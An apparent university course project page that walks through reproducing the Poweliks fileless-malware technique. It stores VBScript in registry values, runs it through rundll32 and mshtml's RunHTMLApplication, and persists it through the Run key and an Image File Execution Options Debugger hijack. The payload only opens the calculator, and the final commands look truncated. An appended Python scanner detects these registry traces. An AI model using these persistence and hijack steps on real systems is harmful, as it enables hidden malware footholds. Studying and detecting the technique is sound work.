CSC427: Computer Security, Winter 2016

Poweliks

Group: Dmitriy & James

Main Commands:

Set WshShell = CreateObject("WScript.Shell")
Set oExec = WshShell.Exec("calc.exe")

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";wsh=new%20ActiveXObject("WScript.Shell");wstr1=wsh.regread("HKEY_CURRENT_USER\\Software\\poweliks_reg1");wstr2=wsh.regread("HKEY_CURRENT_USER\\Software\\poweliks_reg2");document.write("")

Steps

//-----Get Familiar with environment
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert("foo");

//-----Run calculator using WScript.Shell Run from environment 
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";MyObject=new%20ActiveXObject("WScript.Shell");MyObject.Run("calc.exe");

//-----This can be a runnable .vbs file that launches the calculator
Set WshShell = CreateObject("WScript.Shell")
Set oExec = WshShell.Exec("calc.exe")

//-----Run the internals of the .vbs file within the environment
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("")

//-----Write .vbs internals into registry keys
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";MyObject=new%20ActiveXObject("WScript.Shell");MyObject.regwrite("HKEY_CURRENT_USER\\SOFTWARE\\poweliks_reg1","Set WshShell = CreateObject(\"WScript.Shell\")");
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";MyObject=new%20ActiveXObject("WScript.Shell");MyObject.regwrite("HKEY_CURRENT_USER\\SOFTWARE\\poweliks_reg2","Set oExec = WshShell.Exec(\"calc.exe\")");

//-----Check the keys by reading them with WScript.Shell.regread and showing them with alert from JavaScript within the environment
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";MyObject=new%20ActiveXObject("WScript.Shell");alert(MyObject.regread("HKEY_CURRENT_USER\\SOFTWARE\\poweliks_reg1"));
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";MyObject=new%20ActiveXObject("WScript.Shell");alert(MyObject.regread("HKEY_CURRENT_USER\\SOFTWARE\\poweliks_reg2"));

//-----Final version: read both registry keys into the mshtml document and run them as VBScript without using a .vbs file
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";wsh=new%20ActiveXObject("WScript.Shell");wstr1=wsh.regread("HKEY_CURRENT_USER\\Software\\poweliks_reg1");wstr2=wsh.regread("HKEY_CURRENT_USER\\Software\\poweliks_reg2");document.write("")

Basic Injection into Registry Startup

//-----Write the final version of the string (above) as a value under the following registry key and restart
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Advanced Injection into Registry Startup

//-----Navigate to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

//-----Create a new key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe

//-----Add a new string value "Debugger" whose data is the final version of the string above
Debugger -> "rundll32.exe ..."

//-----Save and try to launch calc.exe
OMG!
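Added example from the defender's side (not part of the project page or its commands): a Python script that parses a .reg export and flags the traces the steps above leave in the registry. It looks for the rundll32.exe javascript: launcher with mshtml,RunHTMLApplication, WScript.Shell instantiation, regread of a payload key, VBScript stored in registry values, and the two persistence locations used here (the Run key and an Image File Execution Options Debugger value). The export text, value names, tag names and severity levels are constructed for the example; the .reg parser only handles string values.

```python
import re

# Constructed .reg export (not real telemetry): a benign Run value, a Poweliks-style
# Run value, the two staging keys from the project page, a Poweliks-style IFEO Debugger
# for calc.exe, and an ordinary IFEO Debugger that points at a real debugger binary.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
@="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";wsh=new%20ActiveXObject(\"WScript.Shell\");wstr1=wsh.regread(\"HKEY_CURRENT_USER\\\\Software\\\\poweliks_reg1\");document.write(\"\")"

[HKEY_CURRENT_USER\Software\poweliks_reg1]
@="Set WshShell = CreateObject(\"WScript.Shell\")"

[HKEY_CURRENT_USER\Software\poweliks_reg2]
@="Set oExec = WshShell.Exec(\"calc.exe\")"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe]
"Debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";alert(\"foo\");"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Program Files\\Tools\\debugger.exe"
"""

# One .reg value line: either @="data" (default value) or "name"="data".
# Only REG_SZ lines are handled; dword:/hex: lines are skipped.
VALUE_LINE = re.compile(r'^(?:(?P<default>@)|"(?P<name>(?:[^"\\]|\\.)*)")="(?P<data>(?:[^"\\]|\\.)*)"$')

# Indicators drawn from the launcher and payload strings on the page.
RUNDLL_JS = re.compile(r"rundll32(\.exe)?\s+javascript:", re.IGNORECASE)
RUNHTA = re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.IGNORECASE)
WSH_ACTIVEX = re.compile(r'ActiveXObject\s*\(\s*["\']WScript\.Shell["\']\s*\)', re.IGNORECASE)
REGREAD = re.compile(r"\.regread\s*\(", re.IGNORECASE)
VBS_CREATEOBJ = re.compile(r'CreateObject\s*\(\s*["\']WScript\.Shell["\']', re.IGNORECASE)
WSH_INVOKE = re.compile(r"\b\w+\.(Exec|Run)\s*\(", re.IGNORECASE)
# Persistence locations used in the project.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
IFEO_KEY = re.compile(r"\\Image File Execution Options\\[^\\]+$", re.IGNORECASE)

SCRIPT_TAGS = {"rundll32-javascript", "mshtml-RunHTMLApplication", "wscript-shell-activex",
               "registry-payload-read", "vbscript-createobject", "wsh-exec-run"}
PERSIST_TAGS = {"persistence:run-key", "ifeo-debugger"}


def unescape(s):
    """Undo .reg escaping: \\ -> \ and \" -> \" (backslash followed by any char)."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Return (key, value_name, data) tuples for every string value in a .reg export."""
    records, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            name = "" if m.group("default") else unescape(m.group("name"))
            records.append((key, name, unescape(m.group("data"))))
    return records


def classify(key, name, data):
    """Return the list of indicator tags that apply to one registry value."""
    tags = []
    for tag, pattern in (("rundll32-javascript", RUNDLL_JS), ("mshtml-RunHTMLApplication", RUNHTA),
                         ("wscript-shell-activex", WSH_ACTIVEX), ("registry-payload-read", REGREAD),
                         ("vbscript-createobject", VBS_CREATEOBJ), ("wsh-exec-run", WSH_INVOKE)):
        if pattern.search(data):
            tags.append(tag)
    if tags and RUN_KEY.search(key):
        tags.append("persistence:run-key")          # script-like data in an autostart value
    if IFEO_KEY.search(key) and name.lower() == "debugger":
        tags.append("ifeo-debugger")                 # any IFEO Debugger value deserves review
    return tags


def severity(tags):
    t = set(tags)
    if t & SCRIPT_TAGS and t & PERSIST_TAGS:
        return "critical"   # script launcher sitting in a persistence location
    if t & SCRIPT_TAGS:
        return "high"       # script stored in the registry (e.g. the staging keys)
    if t & PERSIST_TAGS:
        return "medium"     # IFEO Debugger present; verify it is a legitimate debugger
    return "clean"


def scan(records):
    """Classify every record and return findings in input order."""
    return [{"key": k, "name": n, "severity": severity(classify(k, n, d)), "tags": classify(k, n, d)}
            for k, n, d in records]


if __name__ == "__main__":
    for f in scan(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"{f['severity']:8} {f['key']}\\{f['name'] or '(Default)'}  {f['tags']}")
```

Running it against a real export (`reg export HKCU\Software out.reg` and the IFEO key from HKLM) shows the Run value and the calc.exe Debugger as critical, the two poweliks_reg staging values as high, and a Debugger value that merely names a debugger binary as medium for manual review; an empty or unusual value name in the Run key is itself worth a second look even before the data is inspected.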

Resources: